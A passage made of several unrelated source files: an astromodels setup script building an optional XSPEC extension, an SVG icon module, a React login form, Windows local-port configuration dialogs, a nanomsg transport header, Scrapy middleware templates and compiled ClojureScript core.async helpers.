    :raises IOError: if Xspec appears installed but one of its libraries
        cannot be located.
    """

    headas_root = os.environ.get("HEADAS")
    conda_prefix = os.environ.get("CONDA_PREFIX")
    xspec_version = os.environ.get("ASTRO_XSPEC_VERSION")

    # thanks to the sherpa team for this
    if xspec_version is None:

        print("WARN: You have not specified an XSPEC version with the ")
        print("WARN: environment variable ASTRO_XSPEC_VERSION")
        print(f"WARN: we will assume you have {_default_xspec_version}")

        xspec_raw_version = _default_xspec_version

    else:

        print(f"WARN: you have specified you have XSPEC version {xspec_version}")

        xspec_raw_version = xspec_version

    xspec_version = LooseVersion(xspec_raw_version)

    macros = []

    if xspec_version < LooseVersion("12.9.0"):
        print("WARN: XSPEC Version is less than 12.9.0, which is the minimal supported version for astromodels")

    # Define an XSPEC_<major>_<minor>_<patch> macro for every known version
    # at or below the one we are building against, so the C++ wrapper can
    # adapt to API differences between XSPEC releases.
    for major, minor, patch in [(12, 9, 0), (12, 9, 1),
                                (12, 10, 0), (12, 10, 1),
                                (12, 11, 0), (12, 11, 1),
                                (12, 12, 0), (12, 12, 1)]:

        version = '{}.{}.{}'.format(major, minor, patch)
        macro = 'XSPEC_{}_{}_{}'.format(major, minor, patch)

        if xspec_version >= LooseVersion(version):
            macros += [(macro, None)]

    print(macros)

    if headas_root is None:

        # See, maybe we are running in Conda
        if conda_prefix is None:
            # Maybe this is a Conda build
            conda_prefix = os.environ.get("PREFIX")

        if conda_prefix is not None:

            # Yes, this is Conda
            # Let's see if the package xspec-modelsonly has been installed by checking whether one of the Xspec
            # libraries exists within conda
            conda_lib_path = os.path.join(conda_prefix, 'lib')
            this_lib, this_lib_path = find_library('XSFunctions', additional_places=[conda_lib_path])

            if this_lib is None:
                # No, there is no library in Conda
                print("No xspec-modelsonly package has been installed in Conda. Xspec support will not be installed")
                print("Was looking into %s" % conda_lib_path)
                return None
            else:
                print("The xspec-modelsonly package has been installed in Conda. Xspec support will be installed")
                # Set up the HEADAS variable so that the following will find the libraries
                headas_root = conda_prefix

        else:
            print("No HEADAS env. variable set. Xspec support will not be installed ")
            return None

    else:
        print("\n Xspec is detected. Will compile the Xspec extension.\n")
        print("\n NOTICE!!!!!\n")
        print("If you have issues, manually set the ENV variable XSPEC_INC_PATH")
        print("To the location of the XSPEC headers\n\n")
        print("If you are still having issues, unset HEADAS before installing and contact the support team")

    # Make sure these libraries exist and are linkable right now
    # (they need to be in LD_LIBRARY_PATH or DYLD_LIBRARY_PATH or in one of the system paths)
    libraries_root = ['XSFunctions', 'XSModel', 'XSUtil', 'XS', 'cfitsio', 'CCfits', 'wcs', 'gfortran']

    libraries = []
    library_dirs = []

    for lib_root in libraries_root:

        this_library, this_library_path = find_library(lib_root, additional_places=[os.path.join(headas_root, 'lib')])

        if this_library is None:
            raise IOError("Could not find library %s. Impossible to compile Xspec" % lib_root)
        else:
            print("Found library %s in %s" % (this_library, this_library_path))
            libraries.append(this_library)

            if this_library_path is not None:
                # This library is not in one of the system path library, we need to add
                # it to the -L flag during linking. Let's put it in the library_dirs list
                # which will be used in the Extension class
                library_dirs.append(this_library_path)

    # try to manually add on the include directory
    header_paths = []

    if library_dirs:
        # grab it from the lib assuming that it is one up
        xspec_path, _ = os.path.split(library_dirs[0])
        include_path = os.path.join(xspec_path, "include")
        header_paths.append(include_path)

    # let's be sure to add the conda include directory
    if conda_prefix is not None:
        conda_include_path = os.path.join(conda_prefix, 'include')
        header_paths.append(conda_include_path)

    # check if the user has set the location of the xspec headers:
    xspec_headers_path = os.environ.get("XSPEC_INC_PATH")

    if xspec_headers_path is not None:
        print("You have set XSPEC_INC_PATH=%s" % xspec_headers_path)
        header_paths.append(xspec_headers_path)

    # Remove duplicates from library_dirs and header_paths
    library_dirs = list(set(library_dirs))
    header_paths = list(set(header_paths))

    # Configure the variables to build the external module with the C/C++ wrapper
    ext_modules_configuration = [
        Extension("astromodels.xspec._xspec",
                  ["astromodels/xspec/src/_xspec.cc", ],
                  include_dirs=header_paths,
                  libraries=libraries,
                  library_dirs=library_dirs,
                  runtime_library_dirs=library_dirs,
                  extra_compile_args=[], define_macros=macros),
    ]

    return ext_modules_configuration
# Normal packages
# Pure-Python packages that are always installed.
packages = ['astromodels',
            'astromodels/core',
            'astromodels/functions',
            'astromodels/functions/functions_1D',
            'astromodels/functions/dark_matter',
            'astromodels/sources',
            'astromodels/utils',
            'astromodels/xspec',
            'astromodels/tests'
            ]

# Check whether we can compile Xspec support
# (None when Xspec cannot be found; the extension build is then skipped.)
ext_modules_configuration = setup_xspec()
# Add the node_ctype module
setup(

    setup_requires=['numpy'],

    #cmdclass={'build_ext': My_build_ext},

    # Let versioneer wrap our custom build_ext so both version handling and
    # the numpy include-dir injection happen during the build.
    cmdclass=versioneer.get_cmdclass({'build_ext': My_build_ext}),

    packages=packages,

    data_files=[('astromodels/data/functions', glob.glob('astromodels/data/functions/*.yaml')),
                ('astromodels/data/tests', glob.glob('astromodels/data/tests/*.fits'))
                ],

    # The __version__ comes from the exec at the top
    version=versioneer.get_version(),

    download_url='https://github.com/threeml/astromodels/archive/v0.1',

    keywords=['Likelihood', 'Models', 'fit'],

    # None when Xspec was not found (see setup_xspec above).
    ext_modules=ext_modules_configuration,

    package_data={
        'astromodels': ['data/dark_matter/*', 'data/xsect/*', 'data/past_1D_values.h5'],
    },
)
|
// Pre-parsed trusted SVG markup (a bell/notification glyph) for direct use
// in Mithril views via m.trust().
var m = require('mithril');
module.exports = m.trust('<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" baseProfile="full" width="24" height="24" viewBox="0 0 24.00 24.00" enable-background="new 0 0 24.00 24.00" xml:space="preserve"><path fill="#000000" fill-opacity="1" stroke-width="1.33333" stroke-linejoin="miter" d="M 21,19L 21,20L 3,20L 3,19L 5,17L 5,11C 4.99921,7.9037 7.03273,5.1747 10,4.29C 9.99508,4.1934 9.99508,4.0966 10,4C 10,2.8954 10.8954,2 12,2C 13.1046,2 14,2.8954 14,4C 14.0049,4.0966 14.0049,4.1934 14,4.29C 16.9673,5.1747 19.0008,7.9037 19,11L 19,17L 21,19 Z M 14,21C 14,22.1046 13.1046,23 12,23C 10.8954,23 10,22.1046 10,21M 19.75,3.19L 18.33,4.61C 20.0367,6.2986 20.9979,8.5991 21,11L 23,11C 23.0077,8.0662 21.8367,5.2522 19.75,3.19 Z M 1,11L 3,11C 3.00207,8.5991 3.96332,6.2986 5.67,4.61L 4.25,3.19C 2.16328,5.2522 0.992297,8.0662 1,11 Z "/></svg>');
|
import {
Button,
Container,
Form,
Icon,
Message,
Segment,
} from 'semantic-ui-react';
import PropTypes from 'prop-types';
import Link from 'next/link';
/**
 * Stateless, controlled login form built with semantic-ui-react.
 *
 * The parent owns all state and behavior:
 * - `user.email` / `user.password` are the current input values; every
 *   keystroke is reported through `handleChange` (inputs are controlled).
 * - `handleSubmit` receives the form's submit event.
 * - `loading` puts the Form into its loading state and also disables the
 *   submit button; `disabled` additionally blocks submission.
 * - `error` toggles the error banner (shown when truthy) and supplies its
 *   message text.
 * - `signupLink` is the Next.js route for the sign-up page.
 */
const LoginForm = ({
  user,
  loading,
  disabled,
  error,
  signupLink,
  handleChange,
  handleSubmit,
}) => (
  <Container text>
    <Message
      attached
      icon="privacy"
      header="Welcome Back!"
      content="Log in with email and password"
      color="black"
    />
    <Form loading={loading} error={Boolean(error)} onSubmit={handleSubmit}>
      <Message error header="Oops!" content={error} />
      <Segment>
        <Form.Input
          fluid
          icon="envelope"
          iconPosition="left"
          label="Email"
          placeholder="Email"
          name="email"
          type="email"
          value={user.email}
          onChange={handleChange}
        />
        <Form.Input
          fluid
          icon="lock"
          iconPosition="left"
          label="Password"
          placeholder="Password"
          name="password"
          type="password"
          value={user.password}
          onChange={handleChange}
        />
        <Button
          disabled={disabled || loading}
          icon="sign in"
          type="submit"
          color="black"
          content="Log in"
        />
      </Segment>
    </Form>
    <Message attached="bottom" warning>
      <Icon name="help" />
      New user?
      <Link href={signupLink}>
        <a>Sign up here</a>
      </Link>
      instead
    </Message>
  </Container>
);
// Runtime prop validation.  Everything is required: this component has no
// defaults because the parent fully owns form state and the handlers.
LoginForm.propTypes = {
  user: PropTypes.shape({
    email: PropTypes.string.isRequired,
    password: PropTypes.string.isRequired,
  }).isRequired,
  loading: PropTypes.bool.isRequired,
  disabled: PropTypes.bool.isRequired,
  // Error message text; the component shows the banner only when truthy,
  // so callers pass an empty string when there is no error.
  error: PropTypes.string.isRequired,
  signupLink: PropTypes.string.isRequired,
  handleChange: PropTypes.func.isRequired,
  handleSubmit: PropTypes.func.isRequired,
};

export default LoginForm;
|
/*++
Copyright (c) 1990-2003 Microsoft Corporation
All rights reserved
Module Name:
dialogs.c
// @@BEGIN_DDKSPLIT
Abstract:
Environment:
User Mode -Win32
Revision History:
// @@END_DDKSPLIT
--*/
#include "precomp.h"
#pragma hdrstop
#include "spltypes.h"
#include "localui.h"
#include "local.h"
#include "dialogs.h"
// Registry/INI value name for the LPT transmission-retry timeout setting.
WCHAR szINIKey_TransmissionRetryTimeout[] = L"TransmissionRetryTimeout";

// Help file used for context-sensitive help in both dialogs (see LocalUIHelp).
WCHAR szHelpFile[] = L"WINDOWS.HLP";

// Maximum characters in a local port name.  LocalMon checks against 247,
// which includes the terminating NUL (see PortNameInitDialog).
#define MAX_LOCAL_PORTNAME 246

// (control ID, help ID) pairs consumed by WinHelp for HELP_WM_HELP /
// HELP_CONTEXTMENU; the array is terminated by the 0,0 pair.
const DWORD g_aHelpIDs[]=
{
    IDD_PN_EF_PORTNAME,          8805136,   // Port Name: "" (Edit)
    IDD_CL_EF_TRANSMISSIONRETRY, 8807704,   // Configure LPT Port: "" (Edit)
    0, 0
};
/*
 *  Dialog procedure for the "Configure LPT Port" dialog.
 *
 *  Dispatches WM_INITDIALOG, WM_COMMAND (OK / Cancel / live validation of
 *  the transmission-retry edit box) and context help messages to the
 *  ConfigureLPTPort* helpers below.  Returns FALSE for any message it does
 *  not handle so default dialog processing runs.
 *
 *  Fix: removed the unreachable "break;" that followed the return in the
 *  WM_HELP / WM_CONTEXTMENU case (dead code).
 */
INT_PTR APIENTRY
ConfigureLPTPortDlg(
    HWND    hwnd,
    UINT    msg,
    WPARAM  wparam,
    LPARAM  lparam
    )
{
    switch(msg)
    {
    case WM_INITDIALOG:
        // lparam carries the PPORTDIALOG context passed to DialogBoxParam.
        return ConfigureLPTPortInitDialog(hwnd, (PPORTDIALOG) lparam);

    case WM_COMMAND:
        switch (LOWORD(wparam))
        {
        case IDOK:
            return ConfigureLPTPortCommandOK(hwnd);

        case IDCANCEL:
            return ConfigureLPTPortCommandCancel(hwnd);

        case IDD_CL_EF_TRANSMISSIONRETRY:
            // Re-validate the timeout edit box on every content change.
            if( HIWORD(wparam) == EN_UPDATE )
                ConfigureLPTPortCommandTransmissionRetryUpdate(hwnd, LOWORD(wparam));
            break;
        }
        break;

    case WM_HELP:
    case WM_CONTEXTMENU:
        return LocalUIHelp(hwnd, msg, wparam, lparam);
    }

    return FALSE;
}
/*
 *  Initialize the "Configure LPT Port" dialog.
 *
 *  Stashes pPort in the window user data for the command handlers, limits
 *  the timeout edit box to TIMEOUT_STRING_MAX characters, then asks the
 *  port monitor server (XcvData "GetTransmissionRetryTimeout") for the
 *  current timeout and seeds the edit control with it.
 *
 *  Returns TRUE on success; FALSE (last error set) if the query fails.
 */
BOOL
ConfigureLPTPortInitDialog(
    HWND        hwnd,
    PPORTDIALOG pPort
    )
{
    DWORD   dwTransmissionRetryTimeout;
    DWORD   cbNeeded;
    DWORD   dwDummy;
    BOOL    rc;
    DWORD   dwStatus;

    // Remember the port context; retrieved later via GetWindowLongPtr.
    SetWindowLongPtr(hwnd, GWLP_USERDATA, (LONG_PTR) pPort);

    SetForegroundWindow(hwnd);

    // Cap user input so the OK handler's fixed-size buffer cannot overflow.
    SendDlgItemMessage( hwnd, IDD_CL_EF_TRANSMISSIONRETRY,
                        EM_LIMITTEXT, TIMEOUT_STRING_MAX, 0 );

    // Get the Transmission Retry Timeout from the host
    rc = XcvData( pPort->hXcv,
                  L"GetTransmissionRetryTimeout",
                  (PBYTE) &dwDummy,
                  0,
                  (PBYTE) &dwTransmissionRetryTimeout,
                  sizeof dwTransmissionRetryTimeout,
                  &cbNeeded,
                  &dwStatus);

    if(!rc) {
        // Transport-level failure: warn but leave the edit box empty.
        DBGMSG(DBG_WARNING, ("Error %d checking TransmissionRetryTimeout\n", GetLastError()));
    } else if(dwStatus != ERROR_SUCCESS) {
        // Server answered with an error status; surface it as last error.
        DBGMSG(DBG_WARNING, ("Error %d checking TransmissionRetryTimeout\n", dwStatus));
        SetLastError(dwStatus);
        rc = FALSE;
    } else {
        // Show the current value and record it as the last known-good entry
        // for the live validation in ...TransmissionRetryUpdate.
        SetDlgItemInt( hwnd, IDD_CL_EF_TRANSMISSIONRETRY,
                       dwTransmissionRetryTimeout, FALSE );
        SET_LAST_VALID_ENTRY( hwnd, IDD_CL_EF_TRANSMISSIONRETRY,
                              dwTransmissionRetryTimeout );
    }

    return rc;
}
/*
 *  OK handler for the "Configure LPT Port" dialog.
 *
 *  Reads the timeout from the edit control, formats it as a decimal string
 *  and sends it to the port monitor server via XcvData
 *  "ConfigureLPTPortCommandOK".  The dialog always ends; its exit code is
 *  the server status on success, else the last error.
 */
BOOL
ConfigureLPTPortCommandOK(
    HWND    hwnd
    )
{
    WCHAR       String[TIMEOUT_STRING_MAX+1];
    UINT        TransmissionRetryTimeout;
    BOOL        b;
    DWORD       cbNeeded;
    PPORTDIALOG pPort;
    DWORD       dwStatus;

    // Recover the port context stored by ConfigureLPTPortInitDialog.
    if ((pPort = (PPORTDIALOG) GetWindowLongPtr(hwnd, GWLP_USERDATA)) == NULL)
    {
        dwStatus = ERROR_INVALID_DATA;
        ErrorMessage (hwnd, dwStatus);
        SetLastError (dwStatus);
        return FALSE;
    }

    // b receives the translation success flag; the value itself was already
    // range-checked live by ...TransmissionRetryUpdate.
    TransmissionRetryTimeout = GetDlgItemInt( hwnd,
                                              IDD_CL_EF_TRANSMISSIONRETRY,
                                              &b,
                                              FALSE );

    StringCchPrintf (String, COUNTOF (String), L"%d", TransmissionRetryTimeout);

    // Send the new timeout to the server; payload is the NUL-terminated
    // wide string including its terminator.
    b = XcvData(pPort->hXcv,
                L"ConfigureLPTPortCommandOK",
                (PBYTE) String,
                (wcslen(String) + 1)*sizeof(WCHAR),
                (PBYTE) &cbNeeded,
                0,
                &cbNeeded,
                &dwStatus);

    EndDialog(hwnd, b ? dwStatus : GetLastError());
    return TRUE;
}
/*
 *  Cancel handler for the "Configure LPT Port" dialog: close the dialog
 *  with ERROR_CANCELLED as its exit code.
 */
BOOL
ConfigureLPTPortCommandCancel(
    HWND    hwnd
    )
{
    EndDialog(hwnd, ERROR_CANCELLED);
    return TRUE;
}
/*
 *  Live (EN_UPDATE) validation of the transmission-retry edit box.
 *
 *  If the current contents parse to a value within [TIMEOUT_MIN,
 *  TIMEOUT_MAX], record it as the last valid entry; otherwise restore the
 *  last valid entry and select it so the user's next keystroke replaces it.
 */
BOOL
ConfigureLPTPortCommandTransmissionRetryUpdate(
    HWND    hwnd,
    WORD    CtlId
    )
{
    int     Value;
    BOOL    OK;

    Value = GetDlgItemInt( hwnd, CtlId, &OK, FALSE );

    if( WITHINRANGE( Value, TIMEOUT_MIN, TIMEOUT_MAX ) )
    {
        SET_LAST_VALID_ENTRY( hwnd, CtlId, Value );
    }
    else
    {
        // Revert to the last accepted value and select all text.
        SetDlgItemInt( hwnd, CtlId, (UINT) GET_LAST_VALID_ENTRY( hwnd, CtlId ), FALSE );
        SendDlgItemMessage( hwnd, CtlId, EM_SETSEL, 0, (LPARAM)-1 );
    }

    return TRUE;
}
/*
 *  Dialog procedure for the "Port Name" (add local port) dialog.
 *
 *  Dispatches WM_INITDIALOG, WM_COMMAND (OK / Cancel) and context-help
 *  messages to the PortName* helpers below; returns FALSE for anything
 *  else so default dialog processing runs.
 *
 *  Fix: the message parameter was declared WORD; a DLGPROC receives a
 *  UINT message.  Declared as UINT for correctness and for consistency
 *  with ConfigureLPTPortDlg above.
 */
INT_PTR CALLBACK
PortNameDlg(
    HWND    hwnd,
    UINT    msg,
    WPARAM  wparam,
    LPARAM  lparam
    )
{
    switch(msg)
    {
    case WM_INITDIALOG:
        // lparam carries the PPORTDIALOG context passed to DialogBoxParam.
        return PortNameInitDialog(hwnd, (PPORTDIALOG)lparam);

    case WM_COMMAND:
        switch (LOWORD(wparam))
        {
        case IDOK:
            return PortNameCommandOK(hwnd);

        case IDCANCEL:
            return PortNameCommandCancel(hwnd);
        }
        break;

    case WM_HELP:
    case WM_CONTEXTMENU:
        return LocalUIHelp(hwnd, msg, wparam, lparam);
    }

    return FALSE;
}
/*
 *  Initialize the "Port Name" dialog: stash the port context in the window
 *  user data and cap the port-name edit box so PortNameCommandOK's
 *  fixed-size buffer cannot overflow.
 */
BOOL
PortNameInitDialog(
    HWND        hwnd,
    PPORTDIALOG pPort
    )
{
    SetForegroundWindow(hwnd);
    SetWindowLongPtr(hwnd, GWLP_USERDATA, (LONG_PTR) pPort);

    // Number used to check port length in LocalMon (247)
    SendDlgItemMessage (hwnd, IDD_PN_EF_PORTNAME, EM_LIMITTEXT, MAX_LOCAL_PORTNAME, 0);

    return TRUE;
}
/*
 *  OK handler for the "Port Name" dialog.
 *
 *  Reads the entered port name and asks the port monitor server to
 *  validate it (XcvData "PortIsValid").  On success the validated name is
 *  duplicated into pPort->pszPortName and the dialog ends with
 *  ERROR_SUCCESS; on failure an error is shown and the dialog stays open
 *  so the user can correct the name.
 */
BOOL
PortNameCommandOK(
    HWND    hwnd
    )
{
    PPORTDIALOG pPort;
    WCHAR       string [MAX_LOCAL_PORTNAME + 1];
    BOOL        rc;
    DWORD       cbNeeded;
    DWORD       dwStatus;

    // Recover the port context stored by PortNameInitDialog.
    if ((pPort = (PPORTDIALOG) GetWindowLongPtr( hwnd, GWLP_USERDATA )) == NULL)
    {
        dwStatus = ERROR_INVALID_DATA;
        ErrorMessage (hwnd, dwStatus);
        SetLastError (dwStatus);
        return FALSE;
    }

    GetDlgItemText( hwnd, IDD_PN_EF_PORTNAME, string, COUNTOF (string) );

    // Ask the server whether the name is acceptable; payload includes the
    // terminating NUL.
    rc = XcvData( pPort->hXcv,
                  L"PortIsValid",
                  (PBYTE) string,
                  (wcslen(string) + 1)*sizeof *string,
                  (PBYTE) NULL,
                  0,
                  &cbNeeded,
                  &dwStatus);

    if (!rc) {
        return FALSE;
    } else if (dwStatus != ERROR_SUCCESS) {
        SetLastError(dwStatus);

        // Invalid names get a specific message with the offending string;
        // anything else gets the generic error popup.
        if (dwStatus == ERROR_INVALID_NAME)
            Message( hwnd, MSG_ERROR, IDS_LOCALMONITOR, IDS_INVALIDPORTNAME_S, string );
        else
            ErrorMessage(hwnd, dwStatus);

        return FALSE;
    } else {
        // Hand the validated name back to the caller via the dialog context.
        pPort->pszPortName = AllocSplStr( string );
        EndDialog( hwnd, ERROR_SUCCESS );
        return TRUE;
    }
}
/*
 *  Cancel handler for the "Port Name" dialog: close the dialog with
 *  ERROR_CANCELLED as its exit code.
 */
BOOL
PortNameCommandCancel(
    HWND    hwnd
    )
{
    EndDialog(hwnd, ERROR_CANCELLED);
    return TRUE;
}
/*++

Routine Name:
    LocalUIHelp

Routine Description:
    Handles context sensitive help for the configure LPTX:
    port and the dialog for adding a local port.  Looks up the help topic
    for the control in g_aHelpIDs and displays it via WinHelp.

Arguments:
    IN HWND   hDlg   - owning dialog window
    IN UINT   uMsg   - WM_HELP or WM_CONTEXTMENU
    IN WPARAM wParam - for WM_CONTEXTMENU, the window the user clicked
    IN LPARAM lParam - for WM_HELP, an LPHELPINFO describing the control

Return Value:
    TRUE if message handled, otherwise FALSE.

--*/
BOOL
LocalUIHelp(
    IN HWND     hDlg,
    IN UINT     uMsg,
    IN WPARAM   wParam,
    IN LPARAM   lParam
    )
{
    BOOL bStatus = FALSE;

    switch( uMsg ){

    case WM_HELP:
        // F1 / "?" button: show the popup for the control in lParam.
        bStatus = WinHelp((HWND)((LPHELPINFO)lParam)->hItemHandle,
                          szHelpFile,
                          HELP_WM_HELP,
                          (ULONG_PTR)g_aHelpIDs );
        break;

    case WM_CONTEXTMENU:
        // Right-click: show the "What's This?" menu for the clicked window.
        bStatus = WinHelp((HWND)wParam,
                          szHelpFile,
                          HELP_CONTEXTMENU,
                          (ULONG_PTR)g_aHelpIDs );
        break;
    }

    return bStatus;
}
|
#ifndef NN_TRANSPORT_INCLUDED
#define NN_TRANSPORT_INCLUDED

#include "nn.h"

#include "aio/fsm.h"

#include "utils/list.h"
#include "utils/msg.h"

#include <stddef.h>

/*  Forward declarations. */
struct nn_sock;
struct nn_optset;

/*  Virtual-function table for a transport-specific socket-option set. */
struct nn_optset_vfptr {
    void (*destroy)(struct nn_optset *self);
    int (*setopt)(struct nn_optset *self, int option, const void *optval,
        size_t optvallen);
    int (*getopt)(
        struct nn_optset *self, int option, void *optval, size_t *optvallen);
};

/*  Base "class" for an option set; transports embed this and supply vfptr. */
struct nn_optset {
    const struct nn_optset_vfptr *vfptr;
};

/*  Endpoint (one bind or connect on a socket). */
struct nn_ep;

/*  Operations a transport implements for an endpoint it owns. */
struct nn_ep_ops {
    void (*stop)(void *);
    void (*destroy)(void *);
};

/*  Attach transport-private ops/data to an endpoint. */
void nn_ep_tran_setup(struct nn_ep *, const struct nn_ep_ops *, void *);

/*  Notify the core that an asynchronous endpoint stop has completed. */
void nn_ep_stopped(struct nn_ep *);

/*  Accessors for the endpoint's context, address and socket options. */
struct nn_ctx *nn_ep_getctx(struct nn_ep *);
const char *nn_ep_getaddr(struct nn_ep *self);
void nn_ep_getopt(
    struct nn_ep *, int level, int option, void *optval, size_t *optvallen);

/*  Peer-compatibility checks (by socket type, or endpoint vs. endpoint). */
int nn_ep_ispeer(struct nn_ep *, int socktype);
int nn_ep_ispeer_ep(struct nn_ep *, struct nn_ep *);

/*  Error reporting and statistics for an endpoint. */
void nn_ep_set_error(struct nn_ep *, int errnum);
void nn_ep_clear_error(struct nn_ep *);
void nn_ep_stat_increment(struct nn_ep *, int name, int increment);

struct nn_pipebase;

/*  Flags returned by the pipe send/recv virtual functions. */
#define NN_PIPEBASE_RELEASE (1)
#define NN_PIPEBASE_PARSED (2)

/*  Virtual-function table a transport supplies for its pipes. */
struct nn_pipebase_vfptr {
    int (*send)(struct nn_pipebase *self, struct nn_msg *msg);
    int (*recv)(struct nn_pipebase *self, struct nn_msg *msg);
};

/*  Per-endpoint options snapshotted into each pipe. */
struct nn_ep_options {
    int sndprio;
    int rcvprio;
    int ipv4only;
};

/*  Base "class" for a transport pipe (one established connection).
    Transports embed this in their own pipe structure. */
struct nn_pipebase {
    struct nn_fsm fsm;
    const struct nn_pipebase_vfptr *vfptr;
    uint8_t state;
    uint8_t instate;
    uint8_t outstate;
    struct nn_sock *sock;
    void *data;
    struct nn_fsm_event in;
    struct nn_fsm_event out;
    struct nn_ep_options options;
};

/*  Pipe lifecycle: init/term, then start/stop once connected. */
void nn_pipebase_init(struct nn_pipebase *self,
    const struct nn_pipebase_vfptr *vfptr, struct nn_ep *ep);
void nn_pipebase_term(struct nn_pipebase *self);
int nn_pipebase_start(struct nn_pipebase *self);
void nn_pipebase_stop(struct nn_pipebase *self);

/*  Completion notifications for asynchronous recv/send. */
void nn_pipebase_received(struct nn_pipebase *self);
void nn_pipebase_sent(struct nn_pipebase *self);

void nn_pipebase_getopt(struct nn_pipebase *self, int level, int option,
    void *optval, size_t *optvallen);
int nn_pipebase_ispeer(struct nn_pipebase *self, int socktype);

/*  Descriptor a transport registers with the core: identity plus the
    entry points for global init/term and per-endpoint bind/connect. */
struct nn_transport {
    const char *name;
    int id;
    void (*init)(void);
    void (*term)(void);
    int (*bind)(struct nn_ep *);
    int (*connect)(struct nn_ep *);
    struct nn_optset *(*optset)(void);
};

#endif // !NN_TRANSPORT_INCLUDED
|
# Define here the models for your spider middleware
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
# useful for handling different item types with a single interface
from itemadapter import is_item, ItemAdapter
class Proj2081SpiderMiddleware:
    """Pass-through spider middleware (Scrapy project template).

    Every hook is implemented as a no-op: responses, results and start
    requests flow through unchanged.  Methods that are not needed could be
    deleted entirely -- Scrapy treats a missing hook as "do not modify".
    """

    @classmethod
    def from_crawler(cls, crawler):
        """Scrapy factory hook: build the middleware and subscribe to the
        spider_opened signal so the spider start is logged."""
        middleware = cls()
        crawler.signals.connect(
            middleware.spider_opened, signal=signals.spider_opened
        )
        return middleware

    def process_spider_input(self, response, spider):
        """Let every response through to the spider untouched.

        Returning None continues processing; raising would divert to
        process_spider_exception.
        """
        return None

    def process_spider_output(self, response, result, spider):
        """Forward the spider's yielded requests/items without modification."""
        yield from result

    def process_spider_exception(self, response, exception, spider):
        """Decline to handle spider exceptions (None lets Scrapy and other
        middlewares deal with them)."""
        return None

    def process_start_requests(self, start_requests, spider):
        """Forward the spider's start requests unchanged (must yield only
        requests, never items)."""
        yield from start_requests

    def spider_opened(self, spider):
        """Signal handler: record that the spider has started."""
        spider.logger.info('Spider opened: %s' % spider.name)
class Proj2081DownloaderMiddleware:
    """Pass-through downloader middleware (Scrapy project template).

    All hooks are no-ops: requests continue down the middleware chain and
    responses come back unchanged.  Unused hooks could simply be removed --
    Scrapy treats a missing hook as "do not modify".
    """

    @classmethod
    def from_crawler(cls, crawler):
        """Scrapy factory hook: build the middleware and subscribe to the
        spider_opened signal so the spider start is logged."""
        middleware = cls()
        crawler.signals.connect(
            middleware.spider_opened, signal=signals.spider_opened
        )
        return middleware

    def process_request(self, request, spider):
        """Continue normal downloading (None = no short-circuit).

        A middleware could instead return a Response/Request or raise
        IgnoreRequest to alter the flow.
        """
        return None

    def process_response(self, request, response, spider):
        """Hand the downloaded response back unchanged."""
        return response

    def process_exception(self, request, exception, spider):
        """Decline to handle download exceptions (None continues the
        process_exception chain)."""
        return None

    def spider_opened(self, spider):
        """Signal handler: record that the spider has started."""
        spider.logger.info('Spider opened: %s' % spider.name)
|
goog.provide('cljs.core.async.impl.ioc_helpers');
goog.require('cljs.core');
goog.require('cljs.core.async.impl.protocols');
// Compiler output from ClojureScript cljs.core.async.impl.ioc-helpers.
// Slot indices into the state-machine array used by core.async's generated
// go-block machines.  Slots 0-5 are machine bookkeeping; user-visible slots
// start at USER_START_IDX (return_chan below reads the channel from slot 6).
cljs.core.async.impl.ioc_helpers.FN_IDX = (0);            // the state-machine function (see run_state_machine)
cljs.core.async.impl.ioc_helpers.STATE_IDX = (1);         // current block id / :finished marker
cljs.core.async.impl.ioc_helpers.VALUE_IDX = (2);         // value delivered to the current block
cljs.core.async.impl.ioc_helpers.BINDINGS_IDX = (3);      // dynamic bindings (not referenced in this chunk)
cljs.core.async.impl.ioc_helpers.EXCEPTION_FRAMES = (4);  // ExceptionFrame chain (not referenced in this chunk)
cljs.core.async.impl.ioc_helpers.CURRENT_EXCEPTION = (5); // in-flight exception (not referenced in this chunk)
cljs.core.async.impl.ioc_helpers.USER_START_IDX = (6);
// NOTE(review): despite the "aset" name this returns arr[idx][o] (a property
// read); it matches the compiled output -- verify against the cljs sources
// before relying on set semantics.
cljs.core.async.impl.ioc_helpers.aset_object = (function cljs$core$async$impl$ioc_helpers$aset_object(arr,idx,o){
return (arr[idx][o]);
});
// Read slot idx of the state array.
cljs.core.async.impl.ioc_helpers.aget_object = (function cljs$core$async$impl$ioc_helpers$aget_object(arr,idx){
return (arr[idx]);
});
/**
 * Returns true if the machine is in a finished state, i.e. the STATE_IDX
 * slot (index 1) holds the keyword :finished.
 */
cljs.core.async.impl.ioc_helpers.finished_QMARK_ = (function cljs$core$async$impl$ioc_helpers$finished_QMARK_(state_array){
return cljs.core.keyword_identical_QMARK_((state_array[(1)]),new cljs.core.Keyword(null,"finished","finished",-1018867731));
});
// Wrap callback f in a minimal channel-operation Handler: always active,
// blockable, and commit() yields f.  The anonymous deftype below is emitted
// lazily on first call (guarded by the typeof chain) -- standard compiler
// output for a deftype inside a function body.
cljs.core.async.impl.ioc_helpers.fn_handler = (function cljs$core$async$impl$ioc_helpers$fn_handler(f){
if((typeof cljs !== 'undefined') && (typeof cljs.core !== 'undefined') && (typeof cljs.core.async !== 'undefined') && (typeof cljs.core.async.impl !== 'undefined') && (typeof cljs.core.async.impl.ioc_helpers !== 'undefined') && (typeof cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374 !== 'undefined')){
} else {

/**
* @constructor
* @implements {cljs.core.async.impl.protocols.Handler}
* @implements {cljs.core.IMeta}
* @implements {cljs.core.IWithMeta}
*/
cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374 = (function (f,meta29375){
this.f = f;
this.meta29375 = meta29375;
this.cljs$lang$protocol_mask$partition0$ = 393216;
this.cljs$lang$protocol_mask$partition1$ = 0;
});
(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.prototype.cljs$core$IWithMeta$_with_meta$arity$2 = (function (_29376,meta29375__$1){
var self__ = this;
var _29376__$1 = this;
return (new cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374(self__.f,meta29375__$1));
}));

(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.prototype.cljs$core$IMeta$_meta$arity$1 = (function (_29376){
var self__ = this;
var _29376__$1 = this;
return self__.meta29375;
}));

